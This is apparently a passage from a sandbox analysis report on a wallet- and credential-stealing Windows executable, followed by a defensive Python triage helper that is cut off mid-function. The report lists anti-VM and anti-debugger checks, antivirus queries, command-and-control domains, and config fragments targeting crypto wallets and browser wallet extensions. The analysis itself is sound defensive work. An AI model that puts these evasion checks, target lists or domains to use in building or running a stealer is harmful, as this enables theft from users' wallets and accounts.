                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B6C3 second address: 33B6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4E0 second address: 33B4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4E4 second address: 33B4F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0549119936h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4F4 second address: 33B4FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B4FC second address: 33B501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B501 second address: 33B510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F05491602D6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B510 second address: 33B514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 349A3B second address: 349A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F05491602D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35D840 second address: 35D844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35D844 second address: 35D852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F05491602E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB05 second address: 35DB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB0B second address: 35DB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB11 second address: 35DB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35DB1B second address: 35DB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E1h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F05491602D6h 0x00000014 jmp 00007F05491602DDh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35F3AA second address: 35F3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 35F3AE second address: 35F3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 362083 second address: 362087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 362298 second address: 3622B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622B2 second address: 3622B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622B8 second address: 3622BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622BC second address: 3622C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3622C0 second address: 3622E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dx, di 0x0000000e push dword ptr [ebp+122D2AFFh] 0x00000014 mov dword ptr [ebp+122D1B97h], ebx 0x0000001a push D9981F08h 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 363664 second address: 363669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 363669 second address: 363674 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F05491602D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 365492 second address: 3654A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119942h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3654A9 second address: 3654BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F500 second address: 27F505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49C036F second address: 49C039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 4E18DDB6h 0x00000012 jmp 00007F05491602E7h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49C039F second address: 49C0407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0549119943h 0x00000014 sbb eax, 7F36D84Eh 0x0000001a jmp 00007F0549119949h 0x0000001f popfd 0x00000020 call 00007F0549119940h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49C0407 second address: 49C0424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dl, D6h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E064F second address: 49E0654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0654 second address: 49E0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0664 second address: 49E0668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0668 second address: 49E066E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E066E second address: 49E06C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0549119944h 0x00000009 adc ah, FFFFFF98h 0x0000000c jmp 00007F054911993Bh 0x00000011 popfd 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F0549119945h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F054911993Dh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E06C0 second address: 49E06C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | Special instruction interceptor: First address: C7B63 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | Special instruction interceptor: First address: C7C3C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | Special instruction interceptor: First address: 2F7BF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\3D Objects
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Google
Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0gnHF2twcT.exe, 00000000.00000003.1577677042.000000000527F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.0000000000999000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: NTICE
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: SICE
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: 0gnHF2twcT.exe String found in binary or memory: rapeflowwj.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: crosshuaht.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: sustainskelet.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: aspecteirs.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: energyaffai.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: necklacebudi.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: discokeyus.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: grannyejh.lat
                Source: 0gnHF2twcT.exe String found in binary or memory: sweepyribs.lat
                Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ZProgram Manager
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: 0gnHF2twcT.exe, 00000000.00000003.1661698239.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR
                Source: 0gnHF2twcT.exe String found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"
                Source: 0gnHF2twcT.exe String found in binary or memory: json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},
                Source: 0gnHF2twcT.exe String found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%
                Source: 0gnHF2twcT.exe String found in binary or memory: jfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: 0gnHF2twcT.exe String found in binary or memory: keystore
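                The .lat domains in the evasion section above and the JSON fragments just listed are the most actionable rows in this report: the fragments are slices of the stealer's embedded target configuration, and the "File opened" rows that follow show that configuration being acted on. The Python below is an added triage helper written for this page; it is not code from Joe Sandbox, from the sample, or from any LummaC tooling. It parses the flat report rows, recovers only the JSON objects that survived whole in the fragments (objects cut off at either end of a fragment are dropped rather than guessed), lists the domains, and labels each opened path against the recovered configuration. The sample rows are a constructed subset copied from this report. Everything beyond what the rows themselves show is an assumption and is marked as such in the code: that "p" is a target path and "z" the folder name used for it, that "en"/"ez" are a browser-extension id and display name, and that %appdata% expands to the sandbox user's roaming profile.

```python
"""Triage helper for the report rows above (added example, not Joe Sandbox or LummaC code).

Parses "Source: ... String found in binary or memory: ..." and "File opened: ..."
rows, recovers complete JSON objects from the stealer-config fragments, lists the
C2 domains, and labels every opened path against what the recovered config targets.
"""
import json
import re
from typing import Dict, List, Tuple

# Constructed input: a subset of rows copied from the report sections above.
# Raw strings keep the doubled backslashes exactly as the report shows them.
REPORT_LINES = [
    r"Source: 0gnHF2twcT.exe String found in binary or memory: rapeflowwj.lat",
    r"Source: 0gnHF2twcT.exe String found in binary or memory: crosshuaht.lat",
    r"Source: 0gnHF2twcT.exe String found in binary or memory: sweepyribs.lat",
    r'Source: 0gnHF2twcT.exe String found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"',
    r'Source: 0gnHF2twcT.exe String found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%',
    r'Source: 0gnHF2twcT.exe String found in binary or memory: jfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto',
    r"Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    r"Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak",
    r"Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
    r"Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPRush",
]

STRING_RE = re.compile(r"String found in binary or memory: (.*)$")
FILE_RE = re.compile(r"File opened: (.*)$")
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")
# One complete collection rule exactly as the fragments show it: t, p, m, z, d, fs.
# Assumption: p is a target path and z the folder it is filed under; the other
# fields are kept raw and not interpreted.
RULE_RE = re.compile(r'"t":\d+,"p":"(?:[^"\\]|\\.)*","m":\[[^\]]*\],"z":"[^"]*","d":\d+,"fs":\d+')
# One complete extension entry. Assumption: en is the extension id, ez its name.
EXT_RE = re.compile(r'"en":"[^"]+","ez":"[^"]+"')
EXT_DIR_RE = re.compile(r"Extension Settings\\([a-p]+)$")
# Assumed expansion of the environment variables used in the config.
ENV_DIRS = {"%appdata%": r"C:\Users\{user}\AppData\Roaming",
            "%localappdata%": r"C:\Users\{user}\AppData\Local"}


def parse_report(lines: List[str]) -> Dict:
    """Split report rows into domains, config rules, extension names and opened paths."""
    domains, rules, extensions, opened = set(), [], {}, []
    for line in lines:
        hit = STRING_RE.search(line)
        if hit:
            value = hit.group(1)
            if DOMAIN_RE.match(value):
                domains.add(value)
            # Objects truncated at either end of a fragment never match and are skipped.
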